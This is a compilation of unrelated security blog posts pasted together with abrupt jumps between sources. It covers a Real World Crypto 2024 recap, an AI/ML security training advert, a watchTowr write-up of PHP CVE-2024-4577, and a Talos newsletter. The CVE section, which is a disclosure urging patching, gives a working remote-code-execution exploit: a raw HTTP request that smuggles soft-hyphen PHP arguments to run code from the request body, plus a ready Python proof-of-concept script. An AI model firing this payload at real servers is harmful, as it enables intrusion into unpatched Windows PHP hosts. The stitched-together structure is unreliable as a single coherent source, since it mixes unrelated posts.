Martin Albrecht and John Schanck presented two complementary discussions on topics in lattice cryptanalysis. In the first presentation, Martin Albrecht did a deep dive into the analysis of the current best known attack for lattice cryptosystems, known as the dual attack, starting with a brief history of the primal and dual attacks, and noting some recent works that questioned the accuracy of some common heuristics, resulting in improved analyses for these dual algorithms. Martin also noted that there doesn’t seem to be a clear reason why the dual attacks appear to perform better than the primal attacks, noting that “it seems morally wrong that the dual attack would beat the primal attack”, since it introduces additional transformations over the direct approaches. Finally, the presentation concluded with a discussion of recent lattice attacks leveraging machine learning models, noting that in his opinion there is currently no reason to believe that ML can threaten lattice cryptosystems.

John Schanck’s following talk focused on the “real cost” of the best-known attacks. The NIST security levels I, III and V aim to guide protocol designers to select parameters which offer guarantees of security matching the cost of the best-known attacks against AES-128, 192 and 256 respectively. However, unlike attacks on AES, the dual-lattice attack has an incredibly expensive and memory-hungry sieving step. To make progress on an attack against Kyber and related schemes, one must perform a huge amount of computation before any progress is made on reducing the key-space (compare this to attacking AES, where you can immediately start guessing keys). The talk featured fun comparisons — a Moon’s weight of silicon would be needed to fabricate enough memory for the naive implementation of the dual attack — and really demonstrated how challenging it is to align the real cost of attacking different cryptographic protocols when the attacks themselves are structured so differently at the algorithmic level. The take-home message from Schanck’s talk was that when memory cost is taken into account, Kyber 768 should be enough for everyone.

Implementation Footguns for Post-Quantum Cryptography

Nadia Heninger presented a very detailed discussion about potential pitfalls she foresees as issues for post-quantum implementations, primarily based on her experiences with implementations of classical cryptography. She noted that many common classes of implementation pitfalls in classical cryptography are still applicable in PQC settings, including RNG issues, issues with sampling or uniformity of distributions (which may be even trickier in the PQC settings, as many lattice schemes require sampling from multiple distributions), API misuse, and missing validation checks, which can be tricky to enforce via tests. This talk resonated with us, as we have already started seeing some of these issues in the post-quantum projects that we have reviewed so far. Finally, her discussion noted that the increased implementation complexity for PQC schemes may be a blessing in disguise, as the more complicated an algorithm seems, the less likely people are to try to implement it themselves, and instead rely on existing implementations, which may end up helping avoid many of these potential issues at scale!

Making Signal Messenger Post Quantum / Making Encrypted Messaging Post Quantum

Rolfe Schmidt gave a fantastic talk on the upgrade to Signal messenger that begins the inclusion of post-quantum cryptography in the key-agreement stage of the protocol, now known as PQXDH. The talk motivated this change as a protection against “harvest now, decrypt later” attacks, with a design philosophy of changing only what strictly needs to be changed to achieve protection against a quantum adversary. Although the key agreement now includes a hybridized protocol using post-quantum algorithms, the ratcheting algorithm is still classical only, so the classical guarantees of the Signal protocol are not yet fully aligned with the post-quantum guarantees. Making the ratchet post-quantum secure is a work in progress for the Signal team, who hope to ensure that messaging performance is not affected by the inclusion of Kyber in the ratcheting mechanism. The design documentation is now available: PQXDH Specification.

In addition to the design and implementation of PQXDH, Signal collaborated with academia to produce a formally verified implementation of PQXDH using both ProVerif and CryptoVerif. Signal explained that through the process of formally verifying the protocol, they not only gained confidence in the changes, but the verification also highlighted parts of the specification which had been under-described and could have led to attacks if misinterpreted. The process thus not only supported the validity of the design but also acts as a guide for a robust description of PQXDH for developers in the future.

Conclusion

Overall, it’s very exciting to see so much movement in real-world post-quantum applications. We look forward to future PQC updates at RWC, RWPQC and elsewhere, and to reviewing PQC projects that come our way!

– Giacomo Pope and Elena Bakos Lang

Key and Certificate Transparency

Key and certificate transparency was a hot topic at this year’s conference. The Levchin Prize was awarded to the team at Google responsible for “creating and deploying Certificate Transparency at scale”. In addition to the public recognition of what that work has pioneered, three talks were scheduled about different aspects of modern transparency solutions.

Invited talk: Key transparency: introduction, recent results, and open problems

The first talk by Melissa Chase from Microsoft Research delved into recent results and open problems in Key Transparency. In modern encrypted messaging deployments, a service provider is generally responsible for distributing users’ public keys. However, what if a man-in-the-middle attacker were to intercept (and meddle with) the public key of the recipient that a sender is trying to establish a secure communication with? Or worse, what if the server were to get compromised? In an end-to-end encrypted messaging setting, key transparency aims to solve this problem of trusted public key distribution which is often glossed over in academic works.

Until recently, the industry solution to the key transparency question was some form of out-of-band verification, in which users can display a fingerprint corresponding to the chat’s encryption key and compare it with one another. Subsequent deployments have made comparing these traditionally long numerical codes easier by displaying a QR code that can be verified when both users are physically close to each other. These solutions can be slightly tedious for users and the industry has started to deploy large-scale and automatic key transparency solutions based on relatively recent academic works such as CONIKS.

In some of these modern key transparency deployments, service providers provide a publicly accessible key directory which keeps track of users’ public keys. Users can then ensure that the key they hold for a given contact is consistent with the key tracked in the latest version of the online key directory. However, granting people access to public key repositories needs to be done while still maintaining user privacy. Indeed, the deployment of such systems should not make it easier for anyone to be able to track individual users’ actions, for example by figuring out when they refresh their keys (if they get a new device for instance) or by allowing attackers to find out which users are participating in the system by identifying personal information (such as phone numbers or email addresses) in the key directory.

In order to realize the goals outlined above, key transparency deployments make use of a few interesting cryptographic primitives. Service providers generally publish the key directory together with a commitment to that directory. In practice, this is usually achieved with a Sparse Merkle Tree, and the commitment is the root of that Merkle Tree. In early academic proposals, the server would post a commitment to the current key directory at regular intervals. Newer developments (such as SEEMless) propose that the server publish commitments to the incremental changes to the key directory, lowering the computational effort required to audit the key transparency tree (since the entire tree does not have to be recomputed and verified). To safeguard the privacy of users, modern key transparency deployments use Verifiable Random Functions (VRFs), which can be thought of as the public-key variant of a hash function. In a VRF, only the private key owner may compute the hash output and its associated proof, but anyone can use the associated public key to verify that the output was calculated correctly. If the leaves of the Merkle tree were computed from the identifying information of users, for example by simply hashing some form of identifier, attackers could easily collect information about users. Using a VRF construction makes it possible to conceal that information, by essentially randomizing the leaf positions in the Merkle tree. Melissa wrapped up the literature review portion of her talk by presenting OPTIKS, a performant new key transparency solution which focuses on scalability, and to which she contributed.
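
To make the commitment side concrete, here is a toy sketch: an ordinary dense Merkle tree over a tiny directory. This is illustrative only; real deployments use sparse Merkle trees keyed by VRF outputs rather than plain identifiers.

```python
# Toy Merkle-tree commitment over a key directory (illustrative only).
import hashlib

def h(data: bytes) -> bytes:
    return hashlib.sha256(data).digest()

def merkle_root(leaves: list[bytes]) -> bytes:
    # Domain-separate leaves from internal nodes to avoid trivial collisions.
    level = [h(b"leaf:" + leaf) for leaf in leaves]
    while len(level) > 1:
        if len(level) % 2:                 # duplicate last node if odd count
            level.append(level[-1])
        level = [h(b"node:" + level[i] + level[i + 1])
                 for i in range(0, len(level), 2)]
    return level[0]

directory = [b"alice:pk_a", b"bob:pk_b", b"carol:pk_c"]
commitment = merkle_root(directory)        # what the provider would publish
print(commitment.hex())
```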

While many of the technical aspects of key transparency seem to be well ironed out in theory, there are still a number of open questions and practical aspects that require further engineering efforts. To start, how does one effectively instantiate the bulletin board, the publicly accessible key directory that should be efficiently and consistently accessible to users? A second crucial and often overlooked point is that of auditors. One common goal of these key transparency deployments is to provide the ability for auditors to validate the consistency of the key directory. But who are these auditors in practice, and what incentives do they have for performing costly validation work? And if they were to identify any wrongdoing, who would they even report such issues to? A third open question Melissa raised was around the security guarantees of such systems and whether stronger security notions could be obtained. For example, in current schemes, users will detect if a service provider maliciously replaces a user’s key, but users themselves can’t prevent it.

WhatsApp Key Transparency

Later that day, Kevin Lewi and Sean Lawlor presented WhatsApp’s key transparency solution. Recent updates to WhatsApp added a feature to automatically validate users’ public keys, based on a key transparency deployment following many of the concepts presented above. Previously, only out-of-band verification was available to chat users. Now, servers publish a commitment to the public key database and, supported by UI updates in the app, the validity of a contact’s key is automatically checked when users access the “Encryption” menu for that contact.

The presentation explored the different technical aspects this deployment necessitated, such as the infrastructure challenges of supporting these updates and the frequency at which they need to be published. The speakers then presented some of the underlying cryptographic constructions used by the deployment. The system uses Sparse Merkle trees and VRFs in a fashion similar to SEEMless, and publishes incremental updates to the key transparency tree in the form of append-only proofs, which are about 200 MB each and are published at approximately five-minute intervals.

Kevin and Sean concluded their presentation by advertising the release of their implementation of the auditable key directory (accessible at https://github.com/facebook/akd), which is what WhatsApp uses in production for their key transparency deployment and which can also be used to verify the consistency proofs by external auditors. Members of NCC Group’s Cryptography Services team reviewed the implementation a few months before the conference; the public report can be found on NCC’s research platform: Public Report – WhatsApp Auditable Key Directory (AKD) Implementation Review.

Modern transparency logs

Finally, on the last day of the conference, Filippo Valsorda gave a talk on modern transparency logs. Drawing parallels with key transparency solutions, Filippo kicked off his talk by framing transparency logs as a reusable primitive: a magic global append-only list of entries, essentially defined by three fundamental questions — what are the entries, who can add them, and who monitors them? Different transparency solutions (such as the Go checksum database, which Filippo used repeatedly as an example throughout his presentation) are ultimately defined by the answers to these questions.

When building transparency log solutions, a fundamental type of attack that must be prevented is presenting different views of the system logs to different users, known as a split-view attack. In a key transparency deployment, for example, one could imagine a compromised (or rogue) server advertising a different public key for a target victim. There are a few ways to counter split-view attacks. The first is to ensure local consistency (for example, with an append-only log); a second measure is peer-to-peer gossip, where peers communicate amongst themselves to ensure they are being served the same system view; and a third measure is witness cosigning. Witnesses are lightweight, third-party entities responsible for verifying consistency proofs between consecutive Merkle tree roots, and which will cosign the new tree head. Given a network of witnesses, more complex policies can be developed, such as requiring a threshold of M-out-of-N signers in order for the tree head to be considered validated.
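
Conceptually, the policy check itself is simple. A toy sketch follows, using HMACs as stand-in “signatures” so the snippet is self-contained; real witnesses verify Merkle consistency proofs and produce actual signatures (e.g. Ed25519) over the checkpoint.

```python
# Conceptual M-out-of-N witness cosigning policy check (illustrative only).
import hashlib
import hmac

WITNESS_KEYS = {"w1": b"k1", "w2": b"k2", "w3": b"k3"}   # stand-in key material

def cosign(witness: str, checkpoint: bytes) -> bytes:
    return hmac.new(WITNESS_KEYS[witness], checkpoint, hashlib.sha256).digest()

def tree_head_valid(checkpoint: bytes, cosigs: dict, threshold: int) -> bool:
    good = sum(
        1 for w, sig in cosigs.items()
        if w in WITNESS_KEYS and hmac.compare_digest(sig, cosign(w, checkpoint))
    )
    return good >= threshold

ckpt = b"origin\n42\nroot-hash"
sigs = {w: cosign(w, ckpt) for w in ("w1", "w2")}
print(tree_head_valid(ckpt, sigs, threshold=2))   # True: 2-of-3 policy met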

Filippo then proceeded to present a number of specifications and work-in-progress items to support modern transparency log deployments. The first is the checkpoint format specification, which is used to interoperate with the witness ecosystem. Checkpoints are essentially signed notes precisely formatted for use in transparency log applications, containing the origin of the checkpoint, the tree size and root hash, and a number of potential co-signatures on that root hash. Recognizing that a checkpoint coupled with an inclusion proof is everything a client needs to verify inclusion offline, Filippo then introduced the concept of “spicy signatures” (🌶️), which are offline-verifiable proofs of inclusion in a transparency log. He concluded his talk by presenting a lightweight CLI tool and showing how spicy signatures can be used efficiently in existing deployments, for example by bringing transparency to the Debian package ecosystem in only a few hours.

– Paul Bottinelli

Symmetric Encryption

This year’s symmetric encryption session reinforced the motivations for modernizing our security requirements and design philosophy when it comes to symmetric primitives and modes of operation based on lessons learned and changing requirements over the past 20 years.

Building the Next Generation of AEAD

The symmetric cryptography session was opened by Sanketh Menda, who had closed out last year’s event with a presentation on “context-committing” AEADs (authenticated encryption with associated data), acknowledging the need for standardized constructions that commit to the complete “context” of an AEAD (e.g., the key and nonce). In his update this year, “Building the Next Generation of AEAD”, a broader set of goals was presented:

  • We sometimes need a fast approach for lightweight devices;
  • We sometimes need a suitable approach for cloud-scale data;
  • We sometimes need nonce-misuse resistance;
  • We sometimes need a nonce-hiding scheme;
  • And as established last time, we sometimes need context commitment.

And is there one ideal scheme to rule them all? Of course not… However, there may be a new approach to designing a family of schemes that facilitates safer use. To this end, a “flexible AEAD” construction is proposed, which presents an implementer with a single set of binary choices corresponding to various security properties, thereby allowing a developer to express their intent rather than choose and compose various modes of operation. Sanketh then presented a series of primitives that can be composed in standard ways to achieve these various security goals.
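
As a purely illustrative sketch of the “express intent” idea (the actual proposal defines its own set of choices and how they map to compositions of primitives):

```python
# Illustrative only: expressing AEAD intent as binary security-property
# choices, which a library could map to a concrete composition of primitives.
from dataclasses import dataclass

@dataclass(frozen=True)
class AeadProfile:
    lightweight: bool = False
    cloud_scale: bool = False
    nonce_misuse_resistant: bool = False
    nonce_hiding: bool = False
    context_committing: bool = False

# The developer states what they need, rather than picking a mode by name.
profile = AeadProfile(nonce_misuse_resistant=True, context_committing=True)
print(profile)
```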

With two excellent back-to-back presentations on the topic, I’m hoping we’ll get to hear a progress update from Sanketh again next year.

What’s wrong with Poly1305?

Jan Gilcher and Jérôme Govinden followed up with a presentation looking back on the development and deployment of Poly1305, asking a fundamental question: “Given today’s advancements and applications, would we still converge on this same design?”. This is motivated by the observation that Poly1305 sacrifices a degree of security in favor of speed on 32-bit platforms using optimizations in the floating-point unit, whereas most modern platforms are 64-bit and leverage the arithmetic logic unit for optimized Poly1305 computations. So how would we build and optimize a Poly1305-like construction on today’s hardware?

Much like the preceding talk, the authors consider a modular construction for a family of polynomial-based hashes, from which Poly1305 and other similar schemes can be implemented based on a set of input parameters. This allows for the efficient testing and comparison of a broad family of implementations which can be tweaked between favoring security level and speed on a given platform. While such an approach does not outperform a hand-optimized implementation of a specific function, it appears to achieve impressive results based on the flexibility it provides.

Leveraging their new construction, the authors present a variant, Poly1163, which is better optimized for current hardware at a similar security level to Poly1305. Impressively, despite not being hand-optimized at all, this variant outperforms OpenSSL’s Poly1305 implementation. On the other end of the design spectrum, the authors also present Poly1503, which focuses on providing higher bit-security by not clamping inputs in the same manner as Poly1305 without a substantial hit to performance.

I want to encrypt 2^64 bytes with AES-GCM using a single key

Shay Gueron closed out the session with his presentation “I want to encrypt 2^64 bytes with AES-GCM using a single key“, which proposes a new mode of operation for AES called double nonce double key (DNDK), purpose-built to extend AES-GCM to support modern cloud-scale encryption tasks using a single key.

AES-GCM is the most widely used AEAD we encounter and is generally a safe choice for most applications when used correctly. However, GCM has a few well-known limitations: the 12-byte initialization value (IV) limits the number of invocations that can be made with a single key, and GCM out of the box does not provide key commitment, meaning that an attacker can produce a single authenticated ciphertext that decrypts to two different messages under two different nonce+key combinations. It is precisely these two problems that DNDK addresses, while striving to remain as close as possible to the GCM construction itself.

In practice, the concept is simple: if the short IV (nonce) is holding us back, then simply make it bigger — say, double its size. But a “double nonce” isn’t quite enough with GCM, since the first internal step is to hash it down to its original smaller size. Instead, we can use AES itself to build a key derivation function that takes as input the “double nonce” and the encryption key, and derives an invocation-specific encryption key. In short, we use our double-nonce-derived key to encrypt our message, and we have DNDK. As a bonus, DNDK supports key commitment out of the box as well, as an optional output parameter. This incurs little practical overhead and does not rely on any additional cryptographic primitives to achieve its security.
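
To make the derive-then-encrypt pattern concrete, here is a toy sketch. To be clear, this is not the actual DNDK-GCM derivation from the draft RFC (which specifies exactly how the derived key and optional key-commitment value are produced); it only illustrates using AES itself as the KDF for a 24-byte nonce:

```python
# Illustrative derive-then-encrypt sketch; NOT the real DNDK-GCM derivation.
import os
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

def derive_key(root_key: bytes, double_nonce: bytes) -> bytes:
    """Derive a per-invocation key from a 24-byte 'double nonce' using
    AES as the PRF (toy construction for illustration only)."""
    assert len(double_nonce) == 24
    ecb = Cipher(algorithms.AES(root_key), modes.ECB()).encryptor()
    # Encrypt two distinct nonce-derived 16-byte blocks and truncate
    # the concatenation to a 256-bit derived key.
    block0 = ecb.update(double_nonce[:12] + b"\x00" * 4)
    block1 = ecb.update(double_nonce[12:] + b"\x01" * 4)
    return (block0 + block1)[:32]

root_key = os.urandom(32)
nonce24 = os.urandom(24)              # the "double nonce"
derived = derive_key(root_key, nonce24)
# Standard GCM under the derived, invocation-specific key.
ct = AESGCM(derived).encrypt(nonce24[:12], b"cloud-scale data", None)
```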

Shay and friends at Meta have provided an optimized open-source implementation of DNDK-GCM, alongside implementations of AES-GCM and AES-GCM-SIV for comparison. A draft RFC has also been published to guide those wishing to implement DNDK for themselves. The Crypto Services team is proud to have supported the development of the DNDK draft RFC, with team members Gérald Doussot, Thomas Pornin, and Eric Schorn being formally acknowledged in the draft RFC.

– Kevin Henry

Real World Cryptography 2025

We look forward to catching up with everyone next year in Sofia, Bulgaria!

Announcing AI/ML safety and security trainings

By Michael D. Brown

We are offering AI/ML safety and security training in summer and fall of this year!

Recent advances in AI/ML technologies have opened up a new world of possibilities for businesses to run more efficiently and offer better services and products. However, incorporating AI/ML into computing systems brings new and unique complexities, risks, and attack surfaces. In our experience helping clients safely and securely deploy these systems, we’ve discovered that their security teams have knowledge gaps at this intersection of AI/ML and systems security. We’ve developed our training to help organizations close this gap and equip their teams with the tools to secure their AI/ML operations pipelines and technology stacks.

What you will learn in our training

Our course is tailored for security engineers, ML engineers, and IT staff who need to understand the unique challenges of securing AI/ML systems deployed on conventional computing infrastructure. Over two days, we provide a comprehensive understanding of AI safety and security that goes beyond basic knowledge to practical and actionable insights into these technologies’ specific dangers and risks. Here’s what you will learn through a blend of instructional training and hands-on case studies:

  1. Fundamentals of AI/ML and cybersecurity: In this module, you will learn how AI/ML models/techniques work, what they can and cannot do, and their limitations. We also cover some essential information and software security topics that may be new for ML engineers.
  2. AI/ML tech stacks and operations pipelines: In our second module, you will learn how AI/ML models are selected, configured, trained, packaged, deployed, and decommissioned. We’ll also explore the everyday technologies in the AI/ML stack that professionals use for these tasks.
  3. Vulnerabilities and remediation: In this module, you will learn about the unique attack surfaces and vulnerabilities present in deployed AI/ML systems. You’ll also learn methods for preventing and/or remediating AI/ML vulnerabilities.
  4. Risk assessment and threat modeling: The fourth module covers practical techniques for conducting comprehensive risk assessments and threat models for AI/ML systems. Our holistic approaches will help you evaluate the safety and security risks AI/ML systems may pose to end users in deployed contexts.
  5. Mitigations, controls, and risk reduction: Finally, you will learn how to implement realistic risk mitigation strategies and practical security controls for AI/ML systems. Our comprehensive strategies address the entire AI/ML ops pipeline and lifecycle.

Equip your team to work at the intersection of security and AI/ML

Trail of Bits combines cutting-edge research with practical, real-world experience to advance the state of the art in AI/ML assurance. Our experts are here to help you confidently take your business to the next level with AI/ML technologies. Please contact us today to schedule an on-site (or virtual) training for your team. Individuals interested in this training can also use this form to be notified in the future when we offer public registration for this course!

No Way, PHP Strikes Again! (CVE-2024-4577)


Orange Tsai tweeted a few hours ago about “One of [his] PHP vulnerabilities, which affects XAMPP by default”, and we were curious, to say the least. XAMPP is a very popular way for administrators and developers to rapidly deploy Apache, PHP, and a bunch of other tools, and any bug that could give us RCE in its default installation sounds pretty tantalizing.

Fortunately for defenders, the bug is only exploitable on Windows-based PHP installations (where PHP is specifically used in CGI mode), under some specific locales:

  • Chinese (both simplified and traditional), and
  • Japanese.

However, Orange cautions that other locales could be affected too, and urges users to upgrade to the latest version of PHP, which fixes these bugs (for details, see his blog post).

We are keen to point out that we are unsure how common this configuration, or deployment type, is in reality. It is also not our job to find out, outside of our client base. But, regardless, it's an interesting vulnerability due to the root cause. Enjoy with us.

Orange's blogpost, while informative, doesn’t tell us exactly what to do to get that sweet RCE. Unfortunately, the wide range of configuration options makes it difficult to conclusively prove an instance to be vulnerable (or not) at a passive glance and, obviously, because a Windows machine's 'locale' is not typically externally fingerprintable. Because of this, we set about reproducing the bug—if we can exploit it, that’s the best way of proving exploitability, right?

Reading Orange's blog, it is clear that the bug only affects PHP's CGI mode. In this mode, the webserver parses HTTP requests and passes them to a PHP script, which then performs some processing on them. For example, querystrings are parsed and passed to the PHP interpreter on the command line - a request such as http://host/cgi.php?foo=bar might be executed as php.exe cgi.php foo=bar.

This does, of course, introduce an avenue for command injection, which is why input is carefully handled and sanitized before calling php.exe (cough CVE-2012-1823). However, it seems there is a corner-case which the developers did not account for, which allows an attacker to break out of the command line and supply arguments that are interpreted by PHP itself. This corner-case relates to how unicode characters are converted into ASCII. This is best explained with an example.

Here are two invocations of php.exe, one malicious and one benign. Can you spot the difference?


No, neither can I. Let’s look at them in a hex editor and see if that gives us any clues.


Hmm, interesting - here we can see that the first invocation uses a normal dash (0x2D), while the second, it seems, uses something else entirely (a ‘soft hyphen,’ apparently), with the code 0xAD (highlighted). While they both appear the same to you and me, they have vastly different meanings to the OS.

An important detail here is that Apache will escape the actual hyphen - 0x2D - but not the second ‘soft hyphen’, 0xAD. After all, it’s not a real hyphen, right? So there’s no need to escape it… right?


Well. It turns out that, as part of unicode processing, PHP will apply what’s known as a ‘best fit’ mapping, and helpfully assume that, when the user entered a soft hyphen, they actually intended to type a real hyphen, and interpret it as such. Herein lies our vulnerability - if we supply a CGI handler with a soft hyphen (0xAD), the CGI handler won’t feel the need to escape it, and will pass it to PHP. PHP, however, will interpret it as if it were a real hyphen, which allows an attacker to sneak extra command line arguments, which begin with hyphens, into the PHP process.

This is remarkably similar to an older PHP bug (when in CGI mode), CVE-2012-1823, and so we can borrow some exploitation techniques developed for this older bug and adapt them to work with our new bug. A helpful writeup advises that, to translate our injection into RCE, we should aim to inject the following arguments:

-d allow_url_include=1 -d auto_prepend_file=php://input

This will accept input from our HTTP request body, and process it using PHP. Straightforward enough - let’s try a version of this equipped with our 0xAD ‘soft hyphen’ instead of the usual hyphen. Maybe it’s enough to slip through the escaping?

POST /test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: {{host}}
User-Agent: curl/8.3.0
Accept: */*
Content-Length: 23
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive

<?php
phpinfo();
?>
 

Oh joy - we’re rewarded with a phpinfo page, showing us we have indeed achieved RCE.
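
For convenience, the same request can be scripted. A minimal sketch (the target URL is a placeholder, and the raw %AD byte must reach the server without normalization):

```python
# Minimal PoC sketch for CVE-2024-4577 against a hypothetical vulnerable
# XAMPP host. %AD is the soft hyphen that PHP's best-fit mapping turns
# into '-', smuggling extra arguments to php.exe.
import requests

target = "http://192.168.1.10/test.php"  # placeholder target
qs = "?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"

r = requests.post(
    target + qs,
    data="<?php phpinfo(); ?>",
    headers={"Content-Type": "application/x-www-form-urlencoded"},
)
print(r.status_code, "vulnerable" if "PHP Version" in r.text else "no phpinfo output")
```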


Conclusions

A nasty bug with a very simple exploit - perfect for a Friday afternoon.

Fortunately, though, patches are available, so we echo Orange Tsai’s advice to upgrade your PHP installation. As always, fantastic work and a salute to Orange Tsai.

Those running in an affected configuration under one of the affected locales - Chinese (simplified or traditional) or Japanese - are urged to do this as fast as humanly possible, as the bug has a high chance of being exploited en masse due to its low exploit complexity. Other users are still strongly encouraged to update:

For Windows running in other locales such as English, Korean, and Western European, due to the wide range of PHP usage scenarios, it is currently not possible to completely enumerate and eliminate all potential exploitation scenarios. Therefore, it is recommended that users conduct a comprehensive asset assessment, verify their usage scenarios, and update PHP to the latest version to ensure security.

We won’t duplicate the advisory here, instead, we advise those individuals seeking remediation advice to refer to the comprehensive advisory.

At watchTowr, we believe continuous security testing is the future, enabling the rapid identification of holistic high-impact vulnerabilities that affect your organisation.

It's our job to understand how emerging threats, vulnerabilities, and TTPs affect your organisation.

If you'd like to learn more about the watchTowr Platform, our Attack Surface Management and Continuous Automated Red Teaming solution, please get in touch.

The sliding doors of misinformation that come with AI-generated search results


As someone who used to think that his entire livelihood would come from writing, I’ve long wondered if any sort of computer or AI could replace my essential functions at work. For now, it seems there are enough holes in AI-generated language that my ability to write down a complete, accurate and cohesive sentence is not in danger. 

But a new wave of AI-generated search results is already turning another crucial part of my job and education on its head: search engine optimization. 

Google recently started placing AI-generated answers to common queries at the top of its search results pages, above credible or original news sources. At first, this resulted in some hilarious mix-ups, including telling people they could mix glue into pizza sauce to keep cheese adhered to their crust, or that it’s safe to eat a small number of rocks every day as part of a balanced diet. 

While these mix-ups were hilarious, I’m worried about the potential implications these features may have in the future for misinformation and fake news on more important or easier-to-believe topics than topping your pizza with glue. 

There currently doesn’t seem to be a rhyme or reason to when these types of results do or don’t show up. Google recently announced several changes to its AI-generated search results that now aim to prevent misleading or downright false information on search queries that cover more “important” topics.  

“For topics like news and health, we already have strong guardrails in place. For example, we aim to not show AI Overviews for hard news topics, where freshness and factuality are important. In the case of health, we launched additional triggering refinements to enhance our quality protections,” the company said in a blog post.  

When testing this out firsthand, I got mixed results. For “hard” news topics, Google isn’t displaying AI-generated results at all: for example, nothing appeared when I searched for “Who should I vote for in the 2024 presidential election?” or “Does the flu vaccine really work?” 

But I did get one of the AI-generated answers when I searched for “When is a fever too high for a toddler?” The displayed answer told me to call a pediatrician if my child is older than three months and has a fever of 102.2 degrees Fahrenheit or higher. Parents’ experience in this realm will differ, but for whatever it’s worth, my daughter’s pediatrician specifically recommended to us not to seek emergency help until a fever has reached 104 degrees or lasts for more than 24 hours even with the use of fever-reducing medicine. 


Google’s AI also displayed information when I searched for “Talos cryptocurrency scams” to try and find one of our past blog posts. This summary was accurate, though it may have copy-pasted some text directly from press coverage of the Talos research in question — that’s a whole different issue that the journalist in me is concerned about. What was also interesting to me was that, when I entered the same exact search query the next day, the results page didn’t display this AI Overview. 


Bing, Microsoft’s direct competitor to Google’s search engine, is also using its own form of AI-curated content to answer queries.  

My concern is what happens when or if these types of answers are generated for news topics that are already rife with misinformation — think elections, politics, public health and violent crime. Even a slight slip-up from one of these language models, such as getting a certain number incorrect or displaying a link from a known fake news or satire site, could have major consequences for spreading disinformation. 

On last week’s episode of Talos Takes, Martin Lee and I discussed how the most convincing forms of disinformation and fake news are short, punchy headlines or social media posts. The average person is not as media literate as we’d like to think, and seeing a quick and easy summary of a topic after they type an answer into a search engine is likely going to be good enough for most users on the internet. It’s usually going above and beyond just to ask someone to click through to the second page of Google’s search results.  

AI’s integration into search engines could change the way many of us interact with the internet — I’ve used Google’s search engine as my homepage since I was in middle school. At the risk of sounding hyperbolic, I don’t want to assume that this is going to be an issue; perhaps companies will sort all the issues out, or AI overviews won’t come for more serious news topics than general life questions. But so far, the results shouldn’t inspire much confidence. 

The one big thing 

Cisco Talos recently discovered a new threat actor called “LilacSquid” targeting the IT and pharmacy sectors, looking to maintain persistent access on victims’ networks. This campaign leverages vulnerabilities in public-facing application servers and compromised remote desktop protocol (RDP) credentials to orchestrate the deployment of a variety of open-source tools, such as MeshAgent and SSF, alongside customized malware, such as "PurpleInk," and two malware loaders we are calling "InkBox" and "InkLoader.”    

Why do I care? 

LilacSquid’s victimology includes a diverse set of victims: information technology organizations building software for the research and industrial sectors in the United States, organizations in the energy sector in Europe, and the pharmaceutical sector in Asia, indicating that the threat actor (TA) may be agnostic of industry verticals and trying to steal data from a variety of sources. Talos assesses with high confidence that this campaign has been active since at least 2021. Multiple tactics, techniques, tools and procedures (TTPs) utilized in this campaign bear some overlap with North Korean APT groups, such as Andariel and its parent umbrella group, Lazarus — these are some of the most active threat actors currently on the threat landscape.  

So now what? 

LilacSquid commonly gains access to targeted victims by exploiting vulnerable web applications, so as always, it’s important to patch any time there’s a vulnerability on your network. Talos has also released new Snort rules, ClamAV signatures and other Cisco Security detection that can detect LilacSquid’s activities and the malware they use.  

Top security headlines of the week 

Several hospitals in London are still experiencing service disruptions after a cyber attack targeting a third-party pathology services provider. Some of the most high-profile healthcare facilities in Britain’s capital had to cancel or reschedule appointments or redirect patients to other hospitals. Lab services provider Synnovis confirmed the ransomware attack in a statement on Tuesday and said it was working with the U.K.’s National Health Service to minimize the effects on patients. This latest ransomware attack is illustrative of the larger cybersecurity issues facing the NHS, which manages a massive network of hospitals across the U.K. and has more than 1.7 million employees. In June 2023, the BlackCat ransomware group stole sensitive data from a few NHS hospitals and posted it on a data leak site. And just last month, a different group threatened to leak data from an NHS board overseeing a region of Scotland. The incident also forced other hospitals in the area to expand their capacities and operations to take on more patients, potentially stretching their resources thin. As of Wednesday afternoon, there was no timetable available for the resolution of these issues. (The Record by Recorded Future, Bloomberg) 

International law enforcement agencies teamed up for what they are calling one of the largest botnet disruptions ever. U.S. prosecutors announced last week that they had dismantled a botnet called “911 S5,” arresting and charging its administrator as part of a global effort. The botnet reportedly infected more than 19 million residential IP addresses, using the compromised devices to mask cybercriminal activity for anyone who paid for access to the botnet. Adversaries had used 911 S5 for a range of malicious activities, including bomb threats, the distribution of child abuse imagery and the creation of fraudulent COVID-19 relief payments totaling more than $6 billion. The administrator, a People’s Republic of China native, is charged with creating and disseminating “malware to compromise and amass a network of millions of residential Windows computers worldwide,” according to a U.S. Department of Justice press release. The botnet was allegedly active between 2014 and July 2022. 911 built its network by offering a phony “free” VPN service to users, allowing them to browse the web while redirecting their IP address and protecting their privacy. However, the VPN service turned the target’s device into a traffic relay for the malicious 911 S5 customers. (U.S. Department of Justice, Krebs on Security) 

In a separate law enforcement campaign called “Operation Endgame,” law enforcement agencies from several countries disrupted droppers belonging to several malware families. Targets included IcedID, SystemBC, Pikabot, Smokeloader, Bumblebee and Trickbot. The coordinated effort between multiple European countries and the U.S. FBI led to four arrests of alleged malware operators and the seizure of more than 100 servers and 2,000 attacker-controlled domains. Eight Russian nationals have also been added to the list of Europe's most wanted fugitives for their alleged roles in developing the botnets behind Smokeloader and TrickBot, two of the most infamous malware families. Law enforcement agencies are also zeroing in on the person they believe to be behind the Emotet botnet, nicknamed “Odd.” "We have been investigating you and your criminal undertakings for a long time and we will not stop here," Operation Endgame warned in a video to threat actors. The investigation also found that the botnet operators had generated more than 69 million Euros by renting out their infrastructure to other threat actors so they could deploy ransomware. (Dark Reading, Europol) 

Can’t get enough Talos? 

Upcoming events where you can find Talos 

AREA41 (June 6 – 7) 

Zurich, Switzerland 

Gergana Karadzhova-Dangela from Cisco Talos Incident Response will highlight the critical importance of actionable incident response documentation for the overall response readiness of an organization. During this talk, she will share commonly observed mistakes when writing IR documentation and ways to avoid them. She will draw on her experiences as a responder who works with customers during proactive activities and actual cybersecurity breaches. 

Cisco Connect U.K. (June 25)

London, England

In a fireside chat, Cisco Talos experts Martin Lee and Hazel Burton discuss the most prominent cybersecurity threat trends of the near future, how these are likely to impact UK organizations in the coming years, and what steps we need to take to keep safe.

BlackHat USA (Aug. 3 – 8) 

Las Vegas, Nevada 

Defcon (Aug. 8 – 11) 

